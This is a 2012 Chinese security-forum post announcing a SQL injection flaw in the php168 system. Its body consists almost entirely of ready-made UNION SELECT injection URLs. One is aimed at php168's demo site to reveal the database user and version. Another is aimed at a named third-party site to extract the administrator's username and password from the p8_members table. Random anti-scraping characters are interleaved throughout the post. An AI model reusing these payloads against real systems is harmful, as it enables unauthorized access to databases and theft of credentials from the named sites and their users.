找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2982|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
9 ^: d  L/ ^; J$ f8 U& K                                                         
% w% h9 _' a1 C                                       
. g4 F: N# H$ h0 V! @. \
+ Z0 Y  j5 ?# y, Q  W' M' n
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
9 z/ q: {8 w) A* S                                                     
  _8 g! u* r' C                                                                   - f9 c; q4 g, a) w0 W0 A1 c9 T& E' u
                                                        3 r* F( q; }0 E" P% M0 m7 \6 j- {1 H
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
! N8 T- t9 |4 @4 s& Y' L- ]
8 N3 b3 j, e1 L  @' u
# j" A9 t5 y" I; W* n: K+ @5 J, R8 a" A
                                                            8 O6 \8 O4 d/ h; P( m9 j

+ T$ z. a- ^4 k  A& ahttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--/ J! @6 Q+ d" S; b

/ L$ x2 d& C+ l4 J  {# ]  w" U5 d4 i# @
- \5 S+ `' F: m4 Z- O+ G
                                                                    , c- o# C; O$ R1 ]& S: |

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表